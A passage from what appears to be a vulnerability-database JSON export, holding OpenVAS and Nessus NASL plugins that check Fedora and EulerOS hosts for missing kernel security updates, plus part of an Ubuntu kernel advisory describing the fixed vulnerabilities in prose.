script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-7462acf8ba\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5V6NQPIGUR73VSTY22YLUKTLEB66AA4U\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the FEDORA-2019-7462acf8ba advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The kernel meta package\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.20.12~200.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-02-05T16:41:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2013-2894", "CVE-2016-7097", "CVE-2018-14610", "CVE-2017-15274", "CVE-2015-8215", "CVE-2016-4913", "CVE-2017-6001", "CVE-2017-16995", "CVE-2018-7757", "CVE-2015-6526", "CVE-2019-9162", "CVE-2016-6198", "CVE-2014-4652", "CVE-2013-2930", "CVE-2016-4470", "CVE-2014-8133", "CVE-2016-4565", "CVE-2017-17864", "CVE-2019-5489"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-05T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191532", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191532", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1532)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1532\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-2894\", \"CVE-2013-2930\", \"CVE-2014-4652\", \"CVE-2014-8133\", \"CVE-2014-9644\", \"CVE-2015-6526\", \"CVE-2015-8215\", \"CVE-2016-4470\", \"CVE-2016-4565\", \"CVE-2016-4913\", \"CVE-2016-6198\", \"CVE-2016-7097\", \"CVE-2017-15274\", \"CVE-2017-16995\", \"CVE-2017-17864\", \"CVE-2017-6001\", \"CVE-2018-14610\", \"CVE-2018-7757\", \"CVE-2019-5489\", \"CVE-2019-9162\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:06:52 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1532)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1532\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1532\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1532 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found in the way the Linux kernel's perf subsystem retrieved userlevel stack traces on PowerPC systems. A local, unprivileged user could use this flaw to cause a denial of service on the system by creating a special stack layout that would force the perf_callchain_user_64() function into an infinite loop.(CVE-2015-6526)\n\nA vulnerability was found in the Linux kernel. Payloads of NM entries are not supposed to contain NUL. When such entry is processed, only the part prior to the first NUL goes into the concatenation (i.e. the directory entry name being encoded by a bunch of NM entries). The process stops when the amount collected so far + the claimed amount in the current NM entry exceed 254. However, the value returned as the total length is the sum of *claimed* sizes, not the actual amount collected. And that's what will be passed to readdir() callback as the name length - 8Kb __copy_to_user() from a buffer allocated by __get_free_page().(CVE-2016-4913)\n\nThe perf_trace_event_perm function in kernel/trace/trace_event_perf.c in the Linux kernel before 3.12.2 does not properly restrict access to the perf subsystem, which allows local users to enable function tracing via a crafted application.(CVE-2013-2930)\n\nThe mincore() implementation in mm/mincore.c in the Linux kernel through 4.19.13 allowed local attackers to observe page cache access patterns of other processes on the same system, potentially allowing sniffing of secret information. (Fixing this affects the output of the fincore program.) Limited remote exploitation may be possible, as demonstrated by latency differences in accessing public files from an Apache HTTP Server.(CVE-2019-5489)\n\nIt was found that the espfix functionality could be bypassed by installing a 16-bit RW data segment into GDT instead of LDT (which espfix checks), and using that segment on the stack. A local, unprivileged user could potentially use this flaw to leak kernel stack addresses.(CVE-2014-8133)\n\nAn issue was discovered in the btrfs filesystem code in the Linux kernel. An out-of-bounds access is possible in write_extent_buffer() when mounting and operating a crafted btrfs image due to a lack of verification at mount time within the btrfs_read_block_groups() in fs/btrfs/extent-tree.c function. This could lead to a system crash and a denial of service.(CVE-2018-14610)\n\nkernel/bpf/verifier.c in the Linux kernel through 4.14.8 mishandles states_equal comparisons between the pointer data type and the UNKNOWN_VALUE data type, which allows local users to obtain potentially sensitive address information, aka a 'pointer leak.'(CVE-2017-17864) ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2018-13053", "CVE-2018-1108", "CVE-2018-12633", "CVE-2019-3460", "CVE-2018-10840", "CVE-2018-13405", "CVE-2018-13095", "CVE-2018-19824", "CVE-2018-12714", "CVE-2018-11506", "CVE-2018-12232", "CVE-2018-19406", "CVE-2018-10853", "CVE-2019-8980", "CVE-2018-13093", "CVE-2018-17182", "CVE-2019-8912", "CVE-2018-14734", "CVE-2018-16862", "CVE-2018-3646", "CVE-2018-1120", "CVE-2018-5391", "CVE-2019-9162", "CVE-2018-18710", "CVE-2018-3620", "CVE-2019-7221", "CVE-2018-10322", "CVE-2018-15471", "CVE-2019-3701", "CVE-2018-10323", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2018-14678", "CVE-2018-19407", "CVE-2018-14633", "CVE-2018-16880", "CVE-2018-3639", "CVE-2018-12896", "CVE-2018-13094"], "description": "The remote host is missing an update for the ", "modified": "2019-04-16T00:00:00", "published": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310875506", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875506", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2019-196ab64d65", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875506\");\n script_version(\"2019-04-16T07:10:04+0000\");\n script_cve_id(\"CVE-2019-8980\", \"CVE-2019-8912\", \"CVE-2019-7221\", \"CVE-2019-6974\", \"CVE-2019-7222\", \"CVE-2018-16880\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-3701\", \"CVE-2018-19406\", \"CVE-2018-19824\", \"CVE-2018-16862\", \"CVE-2018-19407\", \"CVE-2018-18710\", \"CVE-2018-14633\", \"CVE-2018-17182\", \"CVE-2018-5391\", \"CVE-2018-15471\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-14734\", \"CVE-2018-14678\", \"CVE-2018-13405\", \"CVE-2018-13053\", \"CVE-2018-12896\", \"CVE-2018-13093\", \"CVE-2018-13094\", \"CVE-2018-13095\", \"CVE-2018-12714\", \"CVE-2018-12633\", \"CVE-2018-12232\", \"CVE-2018-10853\", \"CVE-2018-11506\", \"CVE-2018-10840\", \"CVE-2018-3639\", \"CVE-2018-1120\", \"CVE-2018-10322\", \"CVE-2018-10323\", \"CVE-2018-1108\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-04-16 07:10:04 +0000 (Tue, 16 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-12 04:12:28 +0100 (Tue, 12 Mar 2019)\");\n script_name(\"Fedora Update for kernel FEDORA-2019-196ab64d65\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-196ab64d65\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YHY2JYWF6TLQZKNODGRXDHOGVYDUZAHP\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the FEDORA-2019-196ab64d65 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"kernel on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.20.14~100.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-04-01T02:36:34", "description": "The 4.20.12 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-01T00:00:00", "title": "Fedora 29 : kernel / kernel-headers (2019-7462acf8ba)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8980", "CVE-2019-9162"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:kernel-headers"], "id": "FEDORA_2019-7462ACF8BA.NASL", "href": "https://www.tenable.com/plugins/nessus/122521", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-7462acf8ba.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122521);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2020/02/07\");\n\n script_cve_id(\"CVE-2019-8980\", \"CVE-2019-9162\");\n script_xref(name:\"FEDORA\", value:\"2019-7462acf8ba\");\n\n script_name(english:\"Fedora 29 : kernel / kernel-headers (2019-7462acf8ba)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.20.12 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-7462acf8ba\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel and / or kernel-headers packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9162\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2019-8980\", \"CVE-2019-9162\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2019-7462acf8ba\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"kernel-4.20.12-200.fc29\")) flag++;\nif (rpm_check(release:\"FC29\", reference:\"kernel-headers-4.20.12-200.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-headers\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-01T02:33:24", "description": "The 4.20.14 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.20.13 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.20.12 stable kernel update contains a number of important fixes\nacross the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-12T00:00:00", "title": "Fedora 28 : kernel / kernel-headers (2019-196ab64d65)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8980", "CVE-2019-9162", "CVE-2019-9213"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "p-cpe:/a:fedoraproject:fedora:kernel-headers", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2019-196AB64D65.NASL", "href": "https://www.tenable.com/plugins/nessus/122769", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-196ab64d65.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122769);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/02/05\");\n\n script_cve_id(\"CVE-2019-8980\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n script_xref(name:\"FEDORA\", value:\"2019-196ab64d65\");\n\n script_name(english:\"Fedora 28 : kernel / kernel-headers (2019-196ab64d65)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.20.14 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.20.13 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.20.12 stable kernel update contains a number of important fixes\nacross the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-196ab64d65\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel and / or kernel-headers packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9162\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2019-8980\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2019-196ab64d65\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"kernel-4.20.14-100.fc28\")) flag++;\nif (rpm_check(release:\"FC28\", reference:\"kernel-headers-4.20.14-100.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-headers\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-01T07:34:40", "description": "USN-3930-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.10.\nThis update provides the corresponding updates for the Linux Hardware\nEnablement (HWE) kernel from Ubuntu 18.10 for Ubuntu 18.04 LTS.\n\nMathias Payer and Hui Peng discovered a use-after-free vulnerability\nin the Advanced Linux Sound Architecture (ALSA) subsystem. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an\ninformation leak in the Bluetooth implementation of the Linux kernel.\nAn attacker within Bluetooth range could use this to expose sensitive\ninformation (kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel\ncontained a use-after-free vulnerability. An attacker in a guest VM\nwith access to /dev/kvm could use this to cause a denial of service\n(guest VM crash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free\nvulnerability in the KVM subsystem of the Linux kernel, when using\nnested virtual machines. A local attacker in a guest VM could use this\nto cause a denial of service (system crash) or possibly execute\narbitrary code in the host system. (CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability\nexisted in the KVM subsystem of the Linux kernel, when nested\nvirtualization is used. A local attacker could use this to expose\nsensitive information (host system memory to a guest VM).\n(CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel\nwas insufficiently hardened against Spectre V1 attacks. A local\nattacker could use this to expose sensitive information.\n(CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the\nuser- space API for crypto (af_alg) implementation in the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate\nmemory when handling certain errors while reading files. A local\nattacker could use this to cause a denial of service (excessive memory\nconsumption). (CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIPMI implementation in the Linux kernel. A local attacker with access\nto the IPMI character device files could use this to cause a denial of\nservice (system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP 